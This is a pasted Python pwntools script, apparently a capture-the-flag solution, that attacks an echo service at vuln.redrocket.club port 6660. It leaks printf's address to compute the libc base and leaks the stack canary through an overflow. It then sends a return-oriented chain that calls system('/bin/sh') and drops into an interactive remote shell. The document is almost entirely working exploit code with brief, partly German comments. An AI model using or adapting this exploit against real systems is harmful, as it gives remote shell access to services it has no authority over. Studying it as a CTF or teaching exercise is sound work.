From Mr Smith, 1 Week ago, written in Python.
Embed
  1.  
  2. from colorama import Fore, Back, Style
  3.  
  4. from pwn import *
  5. import sys
  6.  
  7.  
  8. io = remote('vuln.redrocket.club', 6660)
  9.  
  10. # b'Welcome to the echo service 2.0!\n'
  11. print(io.recvline())
  12.  
  13. #b'printf is at 0x....\n'
  14. printf_address = int(io.recvline()[13:-1],16)
  15. print("printf is at "+str(p64(printf_address).hex()))
  16.  
  17.  
  18. ### Calculate Gadget adresses ###
  19. printf_offset  = 0x4f440
  20. system_offset  = 0x04f440
  21. bin_sh_offset  = 0x1b3e9a
  22. pop_rdi_offset = 0x2155f
  23.  
  24. libc_base_address = printf_address - printf_offset
  25. print("libc_base_address is at "+str(p64(libc_base_address).hex()))
  26. system_address = libc_base_address + system_offset
  27. print("system is at "+str(p64(system_address).hex()))
  28. bin_sh_address = libc_base_address + bin_sh_offset
  29. print("bin_sh is at "+str(p64(bin_sh_address).hex()))
  30. pop_rdi_address = libc_base_address + pop_rdi_offset
  31. print("pop_rdi is at "+str(p64(pop_rdi_address).hex()))
  32.  
  33.  
  34.  
  35. ### Leak Stack Canary ###
  36. overflowing_bytes = b"x"*41
  37. print("sending: "+overflowing_bytes.hex())
  38. io.send(overflowing_bytes)
  39. line = io.recvline()
  40. stack_canary = b"0"+line[41:48]
  41. print("stack_canary: "+str(stack_canary.hex()))
  42.  
  43.  
  44.  
  45. ### Prepare Payload ###
  46. tosend = b""
  47.  
  48. # a) padding bis zur stack canary
  49. tosend += b"x"*40
  50.  
  51. # stack canary
  52. tosend += stack_canary
  53.  
  54. # a) padding bis zur RET Adresse
  55. tosend += b"x"*8
  56.  
  57. # b) ret Adresse zum gadget "pop rdi ; ret"
  58. tosend += p64(pop_rdi_address)
  59.  
  60. # c) Pointer zum String "/bin/sh"
  61. tosend += p64(bin_sh_address)
  62.  
  63. # d) ret Adresse zur System Funktion
  64. tosend += p64(system_address)
  65.  
  66. tosend += b"\n"
  67.  
  68. ### Perform Exploit ###
  69. print("sending: "+tosend.hex())
  70. io.send(tosend)
  71. print("answer: "+str(io.recvline()))
  72. io.interactive()
  73. io.close()
  74.  
  75.  
  76.  
  77.  
  78.  
  79.  
captcha